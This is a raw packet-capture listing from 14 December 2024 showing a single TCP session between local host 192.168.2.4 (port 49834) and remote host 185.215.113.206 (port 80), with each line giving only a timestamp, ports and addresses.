Dec 14, 2024 12:56:37.512010098 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.513334036 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.513461113 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.513520956 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.514811039 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.514949083 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.514961958 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.515001059 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.516304016 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.516351938 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.516426086 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.516491890 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.517863035 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.517915010 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.517919064 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.517962933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.519368887 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.519447088 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.519489050 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.519510031 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.520811081 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.520879030 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.520932913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.520979881 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.522345066 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.522399902 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.522475004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.522658110 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.523801088 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.523905039 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.523952961 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.525345087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.525506973 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.525552034 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.526746035 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.526905060 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.526952982 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.528273106 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.528347969 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.528388023 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.528388023 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.529752970 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.529815912 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.529865980 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.529958963 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.531202078 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.531308889 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.531358004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.532659054 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.532779932 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.532839060 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.534070015 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.534126997 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.534209967 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.534313917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.583518982 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.583571911 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.583587885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.583626986 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.584161997 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.584224939 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.584280014 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.584291935 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.584964991 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.585563898 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.585644007 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.585706949 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.585753918 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.586976051 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.587029934 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.587120056 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.587553024 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.588484049 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.588557959 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.588619947 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.588664055 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.589807034 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.589905024 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.589951992 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.591250896 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.591288090 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.591341019 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.592567921 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.592621088 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.592650890 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.592698097 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.593950987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.594002008 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.594072104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.594116926 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.595382929 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.595438004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.595496893 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.595603943 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.642735004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.642788887 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.642843962 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.643002987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.643100977 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.643148899 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.643953085 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.644012928 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.644068956 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.644117117 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.645029068 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.645085096 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.645087957 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.645394087 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.645940065 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.645987034 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.646125078 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.646231890 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.646960974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.647007942 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.647056103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.647643089 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.647954941 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.647990942 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.647994041 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.648027897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.649055958 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.649096012 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.649208069 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.649247885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.650063038 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.650171041 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.650187016 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.650316000 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.651055098 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.651103020 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.651192904 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.651418924 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.652012110 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.652075052 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.652084112 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.652123928 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.652986050 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.653033972 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.653095961 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.653269053 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.653832912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.653879881 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.653887987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.653927088 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.654755116 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.654798985 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.654881001 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.654922009 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.655955076 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.656078100 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.656130075 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.656619072 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.656738997 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.656785011 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.657524109 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.657568932 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.657623053 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.657800913 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.658468962 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.658521891 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.658574104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.658612967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.659399986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.659456968 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.659521103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.659610987 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.660389900 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.660439014 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.660505056 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.661271095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.661315918 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.661385059 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.662228107 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.662287951 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.662355900 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.662997961 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.663161993 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.663212061 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.663285017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.663346052 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.664115906 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.664161921 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.701849937 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.701914072 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.701920986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.701960087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.701961040 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.701997042 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.701998949 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.702035904 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.702955961 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.703010082 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.703036070 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.703052044 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.703629971 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.703680992 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.703762054 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.703809977 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.704561949 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.704608917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.704678059 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.704722881 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.705471992 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.705517054 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.705642939 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.705688953 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.706504107 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.706628084 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.706651926 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.706717968 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.707372904 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.707421064 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.707480907 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.707528114 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.708354950 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.708405018 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.708410978 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.708452940 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.709237099 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.709287882 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.709357023 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.709403038 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.710201979 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.710247040 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.710309029 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.710370064 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.711105108 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.711225033 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.711280107 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.712048054 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.712107897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.712193012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.712986946 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.713040113 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.713093042 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.713910103 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.713959932 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.714076042 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.714122057 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.714890957 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.715008020 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.715040922 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.715059042 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.715833902 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.715882063 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.715944052 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.715987921 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.716741085 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.716795921 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.716859102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.716906071 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.717715025 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.717852116 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.717859983 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.717900038 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.718652964 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.718699932 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.718739033 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.718782902 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.775470018 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.775523901 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.775536060 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.775562048 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.775588989 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.775625944 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.775804996 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.775882006 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.775930882 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.777002096 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.777056932 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.777056932 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.777100086 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.777771950 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.777820110 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.777889013 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.777935982 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.778605938 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.778651953 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.778716087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.778760910 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.779566050 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.779609919 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.779700994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.779819012 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.780627966 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.780723095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.780752897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.780771971 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.781443119 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.781501055 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.781549931 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.782407045 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.782416105 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.782519102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.782521963 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.782569885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.783338070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.783382893 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.783392906 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.783437967 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.834935904 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.834988117 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.835004091 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.835050106 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.835139990 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.835191965 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.835211992 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.835534096 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.836087942 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.836159945 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.836169004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.836214066 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.836980104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.837043047 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.837095022 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.837137938 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.837915897 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.838021040 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.838043928 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.838852882 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.838908911 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.839001894 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.839660883 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.839833975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.839907885 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.839956999 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.840754032 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.840886116 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.840943098 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.841687918 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.841825962 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.841876984 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.842619896 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.842756987 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.842808962 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.843568087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.843660116 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.843684912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:37.843858004 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:37.844499111 CET	80	49834	185.215.113.206	192.168.2.4
